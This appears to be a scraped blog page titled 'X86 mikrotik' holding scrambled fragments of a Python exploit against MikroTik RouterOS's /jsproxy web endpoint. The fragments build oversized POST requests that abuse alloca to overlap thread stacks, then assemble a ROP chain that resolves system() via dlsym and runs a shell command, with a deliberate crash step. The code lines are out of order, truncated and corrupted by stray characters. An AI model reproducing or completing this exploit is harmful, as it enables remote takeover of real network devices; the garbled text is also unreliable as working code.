7/14/2023 0 Comments X86 mikrotik![]() # 2.2) send some bytes as post data to socket 1 (thread A) SocketSend(s1, makeHeader(AST_STACKSIZE SKIP_SPACE ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread A will point inside the stack frame of thread B (the post_data buffer will start from here) # 2.1) send post header with Content-Length bigger than AST_STACKSIZE to socket 1 (thread A) S2 = makeSocket(ip, port) # socket 2, thread B S1 = makeSocket(ip, port) # socket 1, thread A # The server is automatically restarted after 3 secs, so we make it crash with a random address Looking = looking # search again removing last charĮxploit = generateStrncp圜hain(strings, system_chunks) # w_segment = "system"Įxploit = generateStrncp圜hain(strings, cmd_chunks) # w_segment = "bash cmd"Įxploit = ropCall(plt, 0, strings) # dlsym(0, "system"), eax = libc.systemĮxploit = ropCall(gadgets, strings) # system("cmd") Results = Ĭhunks.append((results, len(looking))) ![]() Writable_address = elf.writable_paddrĬhain = ropCall(plt, dst offset, address, length) # get the address of the first writable segment to store strings System_chunks.extend(searchStringChunksLazy(elf, "system\x00"))Ĭmd_chunks.extend(searchStringChunksLazy(elf, shellCmd "\x00")) # Gadget to jump on the result of dlsym (address of system) Gadgets = rop.search(regs=, move=(4*4)).address # Gadgets to clean the stack from arguments Return bytes("POST /jsproxy HTTP/1.1\r\nContent-Length: ") bytes(str(num)) bytes("\r\n\r\n")ĭef ropCall(function_address, *arguments): ![]() ROP_SPACE = 0x8000 # we can send 32 KB of ROP chain!ĪLIGN_SIZE = 0x10 # alloca align memory with "content-length 0x10
0 Comments
Leave a Reply. |